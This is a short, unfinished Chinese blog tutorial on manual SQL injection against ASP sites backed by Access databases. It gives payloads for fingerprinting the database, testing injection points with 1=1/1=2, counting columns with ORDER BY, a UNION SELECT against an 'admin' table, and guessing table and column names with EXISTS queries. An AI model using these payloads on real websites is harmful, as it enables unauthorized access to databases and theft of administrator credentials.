当前位置:首页 > ASP教程 > 存储过程

注入学习(1) Access+asp 暴力猜解

练习一:Access手工注入

Access只有一个数据库,只有表而没有库的概念,所以(一般)使用暴力猜解的方法

Access数据库

  表名

    列名

      数据

1)判断数据库类型

and exists (select * from msysobjects) >0 返回无数据权限等错误即不报错为access数据库

and exists (select * from sysobjects)>0  判断sql server

2)判断是否有注入点

  在以asp?id=xx(任意数字)结尾的连接依次添加:

  • 1=1
  • 1=2

  若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点

3)存在注入点后我们查看有几个字段

  order by n (n为字段个数,这里22是正确,所以有22个字段)

  构造个查询语句,可以看到在3,15的位置有显示,说明这两个位置可以进行查询

 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin

注入学习(1) Access+asp 暴力猜解 - 文章图片

4)接下来我们猜解表名列名,构造语句

查表:and exists (select * from 表名) #存在的话就返回正常 不存在就返回不正常
查列:and exists (select 列名 from 表名)

 woc还没写完手一滑就发布了。。。下午来完善


【说明】本文章由站长整理发布,文章内容不代表本站观点,如文中有侵权行为,请与本站客服联系(QQ:254677821)!